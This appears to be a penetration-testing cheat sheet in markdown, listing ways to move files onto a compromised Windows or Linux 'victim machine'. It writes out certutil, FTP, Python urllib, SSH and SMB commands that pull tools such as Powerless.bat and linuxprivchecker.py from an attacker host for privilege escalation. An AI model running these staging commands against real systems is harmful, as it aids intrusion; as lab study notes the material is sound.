Skip to content

Latest commit

 

History

History
62 lines (42 loc) · 803 Bytes

file-transfers.md

File metadata and controls

62 lines (42 loc) · 803 Bytes
Raw

File Transfers

Windows

certutil.exe -urlcache -split -f "http://10.11.0.98/Powerless.bat" Powerless.bat

FTP

Server

pip install pyftpdlib
python -m pyftpdlib -p 21 -w
# On victim machine
ftp [email protected]

Windows client

ftp -A %ATTACKER_IP%
# switch to binary mode
binary
get <file-name>

Linux Client

ftp $TARGET_IP

Python

*It seems not working for large binary file.

python -c "import urllib; print urllib.urlopen('http://10.11.0.98/<filename>').read()" > <filename>

SSH

ssh [email protected] "cat > linuxprivchecker.py" < linuxprivchecker.py

SMB

Server

smbserver.py a /usr/share/windows-binaries/

Windows client

C:\> \\10.11.0.x\a\whoami.exe